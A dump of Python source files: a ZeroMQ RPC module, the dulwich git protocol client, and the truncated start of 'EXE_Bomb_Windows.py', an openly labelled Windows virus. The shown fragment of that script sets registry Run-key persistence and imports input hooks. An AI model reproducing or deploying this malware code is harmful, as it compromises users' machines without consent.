if not self.__thread.isAlive():
self.__thread.start()
#----------------------------------------------------------------------
def stop(self):
"""停止客户端"""
# 将客户端设为停止
self.__active = False
# 等待工作线程退出
if self.__thread.isAlive():
self.__thread.join()
#----------------------------------------------------------------------
def run(self):
"""客户端运行函数"""
while self.__active:
# 使用poll来等待事件到达,等待1秒(1000毫秒)
if not self.__socketSUB.poll(1000):
continue
# 从订阅socket收取广播数据
topic, datab = self.__socketSUB.recv_multipart()
# 序列化解包
data = self.unpack(datab)
# 调用回调函数处理
self.callback(topic, data)
#----------------------------------------------------------------------
def callback(self, topic, data):
"""回调函数,必须由用户实现"""
raise NotImplementedError
#----------------------------------------------------------------------
def subscribeTopic(self, topic):
"""
Subscribe to broadcast data for a specific topic.
Use topic='' to subscribe to all topics.
Note that topic must be ascii encoded.
"""
self.__socketSUB.setsockopt(zmq.SUBSCRIBE, topic)
########################################################################
class RemoteException(Exception):
"""RPC远程异常"""
#----------------------------------------------------------------------
def __init__(self, value):
"""Constructor"""
self.__value = value
#----------------------------------------------------------------------
def __str__(self):
"""输出错误信息"""
return self.__value
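# Hedged usage sketch (not in the original module): wiring an RpcServer and RpcClient
# together on local ZeroMQ endpoints. The port numbers are placeholders, and byte-string
# topics are used so the snippet works on both Python 2 and 3.
if __name__ == "__main__":
    import time

    def add(a, b):
        return a + b

    server = RpcServer("tcp://*:2014", "tcp://*:4102")
    server.register(add)
    server.start()

    class PrintingClient(RpcClient):
        def callback(self, topic, data):
            print(topic, data)

    client = PrintingClient("tcp://localhost:2014", "tcp://localhost:4102")
    client.subscribeTopic(b"")
    client.start()

    print(client.add(1, 2))          # remote call dispatched through __getattr__
    server.publish(b"heartbeat", time.time())
    time.sleep(1)

    client.stop()
    server.stop(join=True)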
|
client.py
|
# client.py -- Implementation of the server side git protocols
# Copyright (C) 2008-2013 Jelmer Vernooij <jelmer@samba.org>
# Copyright (C) 2008 John Carr
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# or (at your option) a later version of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
"""Client side support for the Git protocol.
The Dulwich client supports the following capabilities:
* thin-pack
* multi_ack_detailed
* multi_ack
* side-band-64k
* ofs-delta
* report-status
* delete-refs
Known capabilities that are not supported:
* shallow
* no-progress
* include-tag
"""
__docformat__ = 'restructuredText'
from io import BytesIO
import dulwich
import select
import socket
import subprocess
import urllib2
import urlparse
from dulwich.errors import (
GitProtocolError,
NotGitRepository,
SendPackError,
UpdateRefsError,
)
from dulwich.protocol import (
_RBUFSIZE,
PktLineParser,
Protocol,
ProtocolFile,
TCP_GIT_PORT,
ZERO_SHA,
extract_capabilities,
)
from dulwich.pack import (
write_pack_objects,
)
from dulwich.refs import (
read_info_refs,
)
def _fileno_can_read(fileno):
"""Check if a file descriptor is readable."""
return len(select.select([fileno], [], [], 0)[0]) > 0
COMMON_CAPABILITIES = ['ofs-delta', 'side-band-64k']
FETCH_CAPABILITIES = (['thin-pack', 'multi_ack', 'multi_ack_detailed'] +
COMMON_CAPABILITIES)
SEND_CAPABILITIES = ['report-status'] + COMMON_CAPABILITIES
class ReportStatusParser(object):
"""Handle status as reported by servers with 'report-status' capability.
"""
def __init__(self):
self._done = False
self._pack_status = None
self._ref_status_ok = True
self._ref_statuses = []
def check(self):
"""Check if there were any errors and, if so, raise exceptions.
:raise SendPackError: Raised when the server could not unpack
:raise UpdateRefsError: Raised when refs could not be updated
"""
if self._pack_status not in ('unpack ok', None):
raise SendPackError(self._pack_status)
if not self._ref_status_ok:
ref_status = {}
ok = set()
for status in self._ref_statuses:
if ' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(' ', 1)
if status == 'ng':
if ' ' in ref:
ref, status = ref.split(' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError('%s failed to update' %
', '.join([ref for ref in ref_status
if ref not in ok]),
ref_status=ref_status)
def handle_packet(self, pkt):
"""Handle a packet.
:raise GitProtocolError: Raised when packets are received after a
flush packet.
"""
if self._done:
raise GitProtocolError("received more data after status report")
if pkt is None:
self._done = True
return
if self._pack_status is None:
self._pack_status = pkt.strip()
else:
ref_status = pkt.strip()
self._ref_statuses.append(ref_status)
if not ref_status.startswith('ok '):
self._ref_status_ok = False
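# Hedged usage sketch (not in the original module): feeding report-status packets to
# the parser by hand. The ref names and statuses below are made up.
def _example_report_status():
    parser = ReportStatusParser()
    parser.handle_packet('unpack ok')
    parser.handle_packet('ok refs/heads/master')
    parser.handle_packet('ng refs/heads/broken non-fast-forward')
    parser.handle_packet(None)  # flush-pkt marks the end of the report
    parser.check()  # raises UpdateRefsError because one ref failed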
def read_pkt_refs(proto):
server_capabilities = None
refs = {}
# Receive refs from server
for pkt in proto.read_pkt_seq():
(sha, ref) = pkt.rstrip('\n').split(None, 1)
if sha == 'ERR':
raise GitProtocolError(ref)
if server_capabilities is None:
(ref, server_capabilities) = extract_capabilities(ref)
refs[ref] = sha
if len(refs) == 0:
return None, set([])
return refs, set(server_capabilities)
# TODO(durin42): this doesn't correctly degrade if the server doesn't
# support some capabilities. This should work properly with servers
# that don't support multi_ack.
class GitClient(object):
"""Git smart server client.
"""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new GitClient instance.
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
self._report_status_parser = None
self._fetch_capabilities = set(FETCH_CAPABILITIES)
self._send_capabilities = set(SEND_CAPABILITIES)
if not thin_packs:
self._fetch_capabilities.remove('thin-pack')
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
if determine_wants is None:
determine_wants = target.object_store.determine_wants_all
f, commit, abort = target.object_store.add_pack()
try:
result = self.fetch_pack(
path, determine_wants, target.get_graph_walker(), f.write,
progress)
except:
abort()
raise
else:
commit()
return result
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
raise NotImplementedError(self.fetch_pack)
def _parse_status_report(self, proto):
unpack = proto.read_pkt_line().strip()
if unpack != 'unpack ok':
st = True
# flush remaining error data
while st is not None:
st = proto.read_pkt_line()
raise SendPackError(unpack)
statuses = []
errs = False
ref_status = proto.read_pkt_line()
while ref_status:
ref_status = ref_status.strip()
statuses.append(ref_status)
if not ref_status.startswith('ok '):
errs = True
ref_status = proto.read_pkt_line()
if errs:
ref_status = {}
ok = set()
for status in statuses:
if ' ' not in status:
# malformed response, move on to the next one
continue
status, ref = status.split(' ', 1)
if status == 'ng':
if ' ' in ref:
ref, status = ref.split(' ', 1)
else:
ok.add(ref)
ref_status[ref] = status
raise UpdateRefsError('%s failed to update' %
', '.join([ref for ref in ref_status
if ref not in ok]),
ref_status=ref_status)
def _read_side_band64k_data(self, proto, channel_callbacks):
"""Read per-channel data.
This requires the side-band-64k capability.
:param proto: Protocol object to read from
:param channel_callbacks: Dictionary mapping channels to packet
handlers to use. None for a callback discards channel data.
"""
for pkt in proto.read_pkt_seq():
channel = ord(pkt[0])
pkt = pkt[1:]
try:
cb = channel_callbacks[channel]
except KeyError:
raise AssertionError('Invalid sideband channel %d' % channel)
else:
if cb is not None:
cb(pkt)
def _handle_receive_pack_head(self, proto, capabilities, old_refs,
new_refs):
"""Handle the head of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param old_refs: Old refs, as received from the server
:param new_refs: New refs
:return: (have, want) tuple
"""
want = []
have = [x for x in old_refs.values() if not x == ZERO_SHA]
sent_capabilities = False
for refname in set(new_refs.keys() + old_refs.keys()):
old_sha1 = old_refs.get(refname, ZERO_SHA)
new_sha1 = new_refs.get(refname, ZERO_SHA)
if old_sha1 != new_sha1:
if sent_capabilities:
proto.write_pkt_line('%s %s %s' % (
old_sha1, new_sha1, refname))
else:
proto.write_pkt_line(
'%s %s %s\0%s' % (old_sha1, new_sha1, refname,
' '.join(capabilities)))
sent_capabilities = True
if new_sha1 not in have and new_sha1 != ZERO_SHA:
want.append(new_sha1)
proto.write_pkt_line(None)
return (have, want)
def _handle_receive_pack_tail(self, proto, capabilities, progress=None):
"""Handle the tail of a 'git-receive-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param progress: Optional progress reporting function
"""
if "side-band-64k" in capabilities:
if progress is None:
progress = lambda x: None
channel_callbacks = {2: progress}
if 'report-status' in capabilities:
channel_callbacks[1] = PktLineParser(
self._report_status_parser.handle_packet).parse
self._read_side_band64k_data(proto, channel_callbacks)
else:
if 'report-status' in capabilities:
for pkt in proto.read_pkt_seq():
self._report_status_parser.handle_packet(pkt)
if self._report_status_parser is not None:
self._report_status_parser.check()
def _handle_upload_pack_head(self, proto, capabilities, graph_walker,
wants, can_read):
"""Handle the head of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param wants: List of commits to fetch
:param can_read: function that returns a boolean that indicates
whether there is extra graph data to read on proto
"""
assert isinstance(wants, list) and isinstance(wants[0], str)
proto.write_pkt_line('want %s %s\n' % (
wants[0], ' '.join(capabilities)))
for want in wants[1:]:
proto.write_pkt_line('want %s\n' % want)
proto.write_pkt_line(None)
have = next(graph_walker)
while have:
proto.write_pkt_line('have %s\n' % have)
if can_read():
pkt = proto.read_pkt_line()
parts = pkt.rstrip('\n').split(' ')
if parts[0] == 'ACK':
graph_walker.ack(parts[1])
if parts[2] in ('continue', 'common'):
pass
elif parts[2] == 'ready':
break
else:
raise AssertionError(
"%s not in ('continue', 'ready', 'common)" %
parts[2])
have = next(graph_walker)
proto.write_pkt_line('done\n')
def _handle_upload_pack_tail(self, proto, capabilities, graph_walker,
pack_data, progress=None, rbufsize=_RBUFSIZE):
"""Handle the tail of a 'git-upload-pack' request.
:param proto: Protocol object to read from
:param capabilities: List of negotiated capabilities
:param graph_walker: GraphWalker instance to call .ack() on
:param pack_data: Function to call with pack data
:param progress: Optional progress reporting function
:param rbufsize: Read buffer size
"""
pkt = proto.read_pkt_line()
while pkt:
parts = pkt.rstrip('\n').split(' ')
if parts[0] == 'ACK':
graph_walker.ack(pkt.split(' ')[1])
if len(parts) < 3 or parts[2] not in (
'ready', 'continue', 'common'):
break
pkt = proto.read_pkt_line()
if "side-band-64k" in capabilities:
if progress is None:
# Just ignore progress data
progress = lambda x: None
self._read_side_band64k_data(proto, {1: pack_data, 2: progress})
else:
while True:
data = proto.read(rbufsize)
if data == "":
break
pack_data(data)
class TraditionalGitClient(GitClient):
"""Traditional Git client."""
def _connect(self, cmd, path):
"""Create a connection to the server.
This method is abstract - concrete implementations should
implement their own variant which connects to the server and
returns an initialized Protocol object with the service ready
for use and a can_read function which may be used to see if
reads would block.
:param cmd: The git service name to which we should connect.
:param path: The path we should pass to the service.
"""
raise NotImplementedError()
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional callback called with progress updates
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
proto, unused_can_read = self._connect('receive-pack', path)
with proto:
old_refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = self._send_capabilities & server_capabilities
if 'report-status' in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
report_status_parser = self._report_status_parser
try:
new_refs = orig_new_refs = determine_wants(dict(old_refs))
except:
proto.write_pkt_line(None)
raise
if not 'delete-refs' in server_capabilities:
# Server does not support deletions. Fail later.
def remove_del(pair):
if pair[1] == ZERO_SHA:
if 'report-status' in negotiated_capabilities:
report_status_parser._ref_statuses.append(
'ng %s remote does not support deleting refs'
% pair[1])
report_status_parser._ref_status_ok = False
return False
else:
return True
new_refs = dict(
filter(
remove_del,
[(ref, sha) for ref, sha in new_refs.iteritems()]))
if new_refs is None:
proto.write_pkt_line(None)
return old_refs
if len(new_refs) == 0 and len(orig_new_refs):
# NOOP - Original new refs filtered out by policy
proto.write_pkt_line(None)
if self._report_status_parser is not None:
self._report_status_parser.check()
return old_refs
(have, want) = self._handle_receive_pack_head(
proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
entries, sha = write_pack_objects(proto.write_file(), objects)
elif len(set(new_refs.values()) - set([ZERO_SHA])) > 0:
# Check for valid create/update refs
filtered_new_refs = \
dict([(ref, sha) for ref, sha in new_refs.iteritems()
if sha != ZERO_SHA])
if len(set(filtered_new_refs.iteritems()) -
set(old_refs.iteritems())) > 0:
entries, sha = write_pack_objects(proto.write_file(), objects)
self._handle_receive_pack_tail(
proto, negotiated_capabilities, progress)
return new_refs
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
proto, can_read = self._connect('upload-pack', path)
with proto:
refs, server_capabilities = read_pkt_refs(proto)
negotiated_capabilities = (
self._fetch_capabilities & server_capabilities)
if refs is None:
proto.write_pkt_line(None)
return refs
try:
wants = determine_wants(refs)
except:
proto.write_pkt_line(None)
raise
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
proto.write_pkt_line(None)
return refs
self._handle_upload_pack_head(
proto, negotiated_capabilities, graph_walker, wants, can_read)
self._handle_upload_pack_tail(
proto, negotiated_capabilities, graph_walker, pack_data, progress)
return refs
def archive(self, path, committish, write_data, progress=None,
write_error=None):
proto, can_read = self._connect(b'upload-archive', path)
with proto:
proto.write_pkt_line("argument %s" % committish)
proto.write_pkt_line(None)
pkt = proto.read_pkt_line()
if pkt == "NACK\n":
return
elif pkt == "ACK\n":
pass
elif pkt.startswith("ERR "):
raise GitProtocolError(pkt[4:].rstrip("\n"))
else:
raise AssertionError("invalid response %r" % pkt)
ret = proto.read_pkt_line()
if ret is not None:
raise AssertionError("expected pkt tail")
self._read_side_band64k_data(proto, {
1: write_data, 2: progress, 3: write_error})
class TCPGitClient(TraditionalGitClient):
"""A Git Client that works over TCP directly (i.e. git://)."""
def __init__(self, host, port=None, *args, **kwargs):
if port is None:
port = TCP_GIT_PORT
self._host = host
self._port = port
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, cmd, path):
sockaddrs = socket.getaddrinfo(
self._host, self._port, socket.AF_UNSPEC, socket.SOCK_STREAM)
s = None
err = socket.error("no address found for %s" % self._host)
for (family, socktype, proto, canonname, sockaddr) in sockaddrs:
s = socket.socket(family, socktype, proto)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
s.connect(sockaddr)
break
except socket.error as err:
if s is not None:
s.close()
s = None
if s is None:
raise err
# -1 means system default buffering
rfile = s.makefile('rb', -1)
# 0 means unbuffered
wfile = s.makefile('wb', 0)
def close():
rfile.close()
wfile.close()
s.close()
proto = Protocol(rfile.read, wfile.write, close,
report_activity=self._report_activity)
if path.startswith("/~"):
path = path[1:]
proto.send_cmd('git-%s' % cmd, path, 'host=%s' % self._host)
return proto, lambda: _fileno_can_read(s)
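# Hedged usage sketch (not in the original module): fetching from a git:// daemon into
# a local repository with TCPGitClient. The host, path and repository location are
# placeholders.
def _example_tcp_fetch():
    from dulwich.repo import Repo
    target = Repo('/tmp/local-clone')          # must already be initialised
    client = TCPGitClient('git.example.org')   # defaults to TCP_GIT_PORT
    remote_refs = client.fetch('/project.git', target)
    return remote_refs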
class SubprocessWrapper(object):
"""A socket-like object that talks to a subprocess via pipes."""
def __init__(self, proc):
self.proc = proc
self.read = proc.stdout.read
self.write = proc.stdin.write
def can_read(self):
if subprocess.mswindows:
from msvcrt import get_osfhandle
from win32pipe import PeekNamedPipe
handle = get_osfhandle(self.proc.stdout.fileno())
return PeekNamedPipe(handle, 0)[2] != 0
else:
return _fileno_can_read(self.proc.stdout.fileno())
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
if self.proc.stderr:
self.proc.stderr.close()
self.proc.wait()
class SubprocessGitClient(TraditionalGitClient):
"""Git client that talks to a server using a subprocess."""
def __init__(self, *args, **kwargs):
self._connection = None
self._stderr = kwargs.pop('stderr', None)
TraditionalGitClient.__init__(self, *args, **kwargs)
def _connect(self, service, path):
import subprocess
argv = ['git', service, path]
p = SubprocessWrapper(
subprocess.Popen(argv, bufsize=0, stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=self._stderr))
return Protocol(p.read, p.write, p.close,
report_activity=self._report_activity), p.can_read
class LocalGitClient(GitClient):
"""Git Client that just uses a local Repo."""
def __init__(self, thin_packs=True, report_activity=None):
"""Create a new LocalGitClient instance.
:param path: Path to the local repository
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
"""
self._report_activity = report_activity
# Ignore the thin_packs argument
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
raise NotImplementedError(self.send_pack)
def fetch(self, path, target, determine_wants=None, progress=None):
"""Fetch into a target repository.
:param path: Path to fetch from
:param target: Target repository to fetch into
:param determine_wants: Optional function to determine what refs
to fetch
:param progress: Optional progress function
:return: remote refs as dictionary
"""
from dulwich.repo import Repo
r = Repo(path)
return r.fetch(target, determine_wants=determine_wants,
progress=progress)
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
"""
from dulwich.repo import Repo
r = Repo(path)
objects_iter = r.fetch_objects(determine_wants, graph_walker, progress)
# Did the process short-circuit (e.g. in a stateless RPC call)? Note
# that the client still expects a 0-object pack in most cases.
if objects_iter is None:
return
write_pack_objects(ProtocolFile(None, pack_data), objects_iter)
# What Git client to use for local access
default_local_git_client_cls = SubprocessGitClient
class SSHVendor(object):
"""A client side SSH implementation."""
def connect_ssh(self, host, command, username=None, port=None):
import warnings
warnings.warn(
"SSHVendor.connect_ssh has been renamed to SSHVendor.run_command",
DeprecationWarning)
return self.run_command(host, command, username=username, port=port)
def run_command(self, host, command, username=None, port=None):
"""Connect to an SSH server.
Run a command remotely and return a file-like object for interaction
with the remote command.
:param host: Host name
:param command: Command to run
:param username: Optional name of user to log in as
:param port: Optional SSH port to use
"""
raise NotImplementedError(self.run_command)
class SubprocessSSHVendor(SSHVendor):
"""SSH vendor that shells out to the local 'ssh' command."""
def run_command(self, host, command, username=None, port=None):
import subprocess
#FIXME: This has no way to deal with passwords..
args = ['ssh', '-x']
if port is not None:
args.extend(['-p', str(port)])
if username is not None:
host = '%s@%s' % (username, host)
args.append(host)
proc = subprocess.Popen(args + command,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
return SubprocessWrapper(proc)
try:
import paramiko
except ImportError:
pass
else:
import threading
class ParamikoWrapper(object):
STDERR_READ_N = 2048 # 2k
def __init__(self, client, channel, progress_stderr=None):
self.client = client
self.channel = channel
self.progress_stderr = progress_stderr
self.should_monitor = bool(progress_stderr) or True
self.monitor_thread = None
self.stderr = ''
# Channel must block
self.channel.setblocking(True)
# Start
if self.should_monitor:
self.monitor_thread = threading.Thread(
target=self.monitor_stderr)
self.monitor_thread.start()
def monitor_stderr(self):
while self.should_monitor:
# Block and read
data = self.read_stderr(self.STDERR_READ_N)
# Socket closed
if not data:
self.should_monitor = False
break
# Emit data
if self.progress_stderr:
self.progress_stderr(data)
# Append to buffer
self.stderr += data
def stop_monitoring(self):
# Stop StdErr thread
if self.should_monitor:
self.should_monitor = False
self.monitor_thread.join()
# Get left over data
data = self.channel.in_stderr_buffer.empty()
self.stderr += data
def can_read(self):
return self.channel.recv_ready()
def write(self, data):
return self.channel.sendall(data)
def read_stderr(self, n):
return self.channel.recv_stderr(n)
def read(self, n=None):
data = self.channel.recv(n)
data_len = len(data)
# Closed socket
if not data:
return
# Read more if needed
if n and data_len < n:
diff_len = n - data_len
return data + self.read(diff_len)
return data
def close(self):
self.channel.close()
self.stop_monitoring()
class ParamikoSSHVendor(object):
def __init__(self):
self.ssh_kwargs = {}
def run_command(self, host, command, username=None, port=None,
progress_stderr=None):
# Paramiko needs an explicit port. None is not valid
if port is None:
port = 22
client = paramiko.SSHClient()
policy = paramiko.client.MissingHostKeyPolicy()
client.set_missing_host_key_policy(policy)
client.connect(host, username=username, port=port,
**self.ssh_kwargs)
# Open SSH session
channel = client.get_transport().open_session()
# Run commands
channel.exec_command(*command)
return ParamikoWrapper(
client, channel, progress_stderr=progress_stderr)
# Can be overridden by users
get_ssh_vendor = SubprocessSSHVendor
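# A minimal sketch of overriding the vendor above (assuming paramiko is available so
# that ParamikoSSHVendor is defined; the host and user below are placeholders):
#
#     import dulwich.client
#     dulwich.client.get_ssh_vendor = ParamikoSSHVendor
#     client = SSHGitClient('git.example.org', username='git')
#
# SSHGitClient._connect calls get_ssh_vendor() to obtain a vendor instance, so the
# replacement must be a callable returning an object with a run_command method.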
class SSHGitClient(TraditionalGitClient):
def __init__(self, host, port=None, username=None, *args, **kwargs):
self.host = host
self.port = port
self.username = username
TraditionalGitClient.__init__(self, *args, **kwargs)
self.alternative_paths = {}
def _get_cmd_path(self, cmd):
return self.alternative_paths.get(cmd, 'git-%s' % cmd)
def _connect(self, cmd, path):
if path.startswith("/~"):
path = path[1:]
con = get_ssh_vendor().run_command(
self.host, ["%s '%s'" % (self._get_cmd_path(cmd), path)],
port=self.port, username=self.username)
return (Protocol(con.read, con.write, con.close,
report_activity=self._report_activity),
con.can_read)
def default_user_agent_string():
return "dulwich/%s" % ".".join([str(x) for x in dulwich.__version__])
def default_urllib2_opener(config):
if config is not None:
proxy_server = config.get("http", "proxy")
else:
proxy_server = None
handlers = []
if proxy_server is not None:
handlers.append(urllib2.ProxyHandler({"http": proxy_server}))
opener = urllib2.build_opener(*handlers)
if config is not None:
user_agent = config.get("http", "useragent")
else:
user_agent = None
if user_agent is None:
user_agent = default_user_agent_string()
opener.addheaders = [('User-agent', user_agent)]
return opener
class HttpGitClient(GitClient):
def __init__(self, base_url, dumb=None, opener=None, config=None, *args,
**kwargs):
self.base_url = base_url.rstrip("/") + "/"
self.dumb = dumb
if opener is None:
self.opener = default_urllib2_opener(config)
else:
self.opener = opener
GitClient.__init__(self, *args, **kwargs)
def _get_url(self, path):
return urlparse.urljoin(self.base_url, path).rstrip("/") + "/"
def _http_request(self, url, headers={}, data=None):
req = urllib2.Request(url, headers=headers, data=data)
try:
resp = self.opener.open(req)
except urllib2.HTTPError as e:
if e.code == 404:
raise NotGitRepository()
if e.code != 200:
raise GitProtocolError("unexpected http response %d" % e.code)
return resp
def _discover_references(self, service, url):
assert url[-1] == "/"
url = urlparse.urljoin(url, "info/refs")
headers = {}
if self.dumb is not False:
url += "?service=%s" % service
headers["Content-Type"] = "application/x-%s-request" % service
resp = self._http_request(url, headers)
try:
self.dumb = (not resp.info().gettype().startswith("application/x-git-"))
if not self.dumb:
proto = Protocol(resp.read, None)
# The first line should mention the service
pkts = list(proto.read_pkt_seq())
if pkts != [('# service=%s\n' % service)]:
raise GitProtocolError(
"unexpected first line %r from smart server" % pkts)
return read_pkt_refs(proto)
else:
return read_info_refs(resp), set()
finally:
resp.close()
def _smart_request(self, service, url, data):
assert url[-1] == "/"
url = urlparse.urljoin(url, service)
headers = {"Content-Type": "application/x-%s-request" % service}
resp = self._http_request(url, headers, data)
if resp.info().gettype() != ("application/x-%s-result" % service):
raise GitProtocolError("Invalid content-type from server: %s"
% resp.info().gettype())
return resp
def send_pack(self, path, determine_wants, generate_pack_contents,
progress=None):
"""Upload a pack to a remote repository.
:param path: Repository path
:param generate_pack_contents: Function that can return a sequence of
the shas of the objects to upload.
:param progress: Optional progress function
:raises SendPackError: if server rejects the pack data
:raises UpdateRefsError: if the server supports report-status
and rejects ref updates
"""
url = self._get_url(path)
old_refs, server_capabilities = self._discover_references(
"git-receive-pack", url)
negotiated_capabilities = self._send_capabilities & server_capabilities
if 'report-status' in negotiated_capabilities:
self._report_status_parser = ReportStatusParser()
new_refs = determine_wants(dict(old_refs))
if new_refs is None:
return old_refs
if self.dumb:
raise NotImplementedError(self.fetch_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
(have, want) = self._handle_receive_pack_head(
req_proto, negotiated_capabilities, old_refs, new_refs)
if not want and old_refs == new_refs:
return new_refs
objects = generate_pack_contents(have, want)
if len(objects) > 0:
entries, sha = write_pack_objects(req_proto.write_file(), objects)
resp = self._smart_request("git-receive-pack", url,
data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_receive_pack_tail(resp_proto, negotiated_capabilities,
progress)
return new_refs
finally:
resp.close()
def fetch_pack(self, path, determine_wants, graph_walker, pack_data,
progress=None):
"""Retrieve a pack from a git smart server.
:param determine_wants: Callback that returns list of commits to fetch
:param graph_walker: Object with next() and ack().
:param pack_data: Callback called for each bit of data in the pack
:param progress: Callback for progress reports (strings)
:return: Dictionary with the refs of the remote repository
"""
url = self._get_url(path)
refs, server_capabilities = self._discover_references(
"git-upload-pack", url)
negotiated_capabilities = self._fetch_capabilities & server_capabilities
wants = determine_wants(refs)
if wants is not None:
wants = [cid for cid in wants if cid != ZERO_SHA]
if not wants:
return refs
if self.dumb:
raise NotImplementedError(self.send_pack)
req_data = BytesIO()
req_proto = Protocol(None, req_data.write)
self._handle_upload_pack_head(
req_proto, negotiated_capabilities, graph_walker, wants,
lambda: False)
resp = self._smart_request(
"git-upload-pack", url, data=req_data.getvalue())
try:
resp_proto = Protocol(resp.read, None)
self._handle_upload_pack_tail(resp_proto, negotiated_capabilities,
graph_walker, pack_data, progress)
return refs
finally:
resp.close()
def get_transport_and_path_from_url(url, config=None, **kwargs):
"""Obtain a git client from a URL.
:param url: URL to open
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
parsed = urlparse.urlparse(url)
if parsed.scheme == 'git':
return (TCPGitClient(parsed.hostname, port=parsed.port, **kwargs),
parsed.path)
elif parsed.scheme == 'git+ssh':
path = parsed.path
if path.startswith('/'):
path = parsed.path[1:]
return SSHGitClient(parsed.hostname, port=parsed.port,
username=parsed.username, **kwargs), path
elif parsed.scheme in ('http', 'https'):
return HttpGitClient(urlparse.urlunparse(parsed), config=config,
**kwargs), parsed.path
elif parsed.scheme == 'file':
return default_local_git_client_cls(**kwargs), parsed.path
raise ValueError("unknown scheme '%s'" % parsed.scheme)
def get_transport_and_path(location, **kwargs):
"""Obtain a git client from a URL.
:param location: URL or path
:param config: Optional config object
:param thin_packs: Whether or not thin packs should be retrieved
:param report_activity: Optional callback for reporting transport
activity.
:return: Tuple with client instance and relative path.
"""
# First, try to parse it as a URL
try:
return get_transport_and_path_from_url(location, **kwargs)
except ValueError:
pass
if ':' in location and not '@' in location:
# SSH with no user@, zero or one leading slash.
(hostname, path) = location.split(':')
return SSHGitClient(hostname, **kwargs), path
elif '@' in location and ':' in location:
# SSH with user@host:foo.
user_host, path = location.split(':')
user, host = user_host.rsplit('@')
return SSHGitClient(host, username=user, **kwargs), path
# Otherwise, assume it's a local path.
return default_local_git_client_cls(**kwargs), location
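# A hypothetical usage sketch of the helpers above (this module is dulwich.client;
# the URLs and repository names below are placeholders, not values from this file):
#
#     client, path = get_transport_and_path('git://git.example.org/project.git')
#     # -> (TCPGitClient instance, '/project.git')
#
#     client, path = get_transport_and_path('gituser@git.example.org:project.git')
#     # -> (SSHGitClient instance with username='gituser', 'project.git')
#
# The client is then used together with the relative path, for example
# client.fetch(path, target_repo) or client.fetch_pack(path, ...).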
|
EXE_Bomb_Windows.py
|
# v1.0
from pynput.mouse import Button, Controller # Importa librería Mouse
import pythoncom, pyHook
from winreg import *
import os
from getpass import getuser
from multiprocessing import Process
import threading
import shutil
import string
import random
def addStartup(): # function = Iniciar automaticamente
path = r"C:\\Users\\Public\\EXEBombWindows\\Virus\\NoMeBorres\\EXE_Bomb_Windows.exe" # Path del Software completo
name = "EXE_Bomb_Windows" # Nombre del StartUp
keyVal = r'Software\Microsoft\Windows\CurrentVersion\Run' # Path del registro
def verificar(): # Evita que se créen 2 veces el Bom
try: # Intenta crear la dirección
os.makedirs('C:\\Users\\Public\\EXEBombWindows\\BoomRUN')
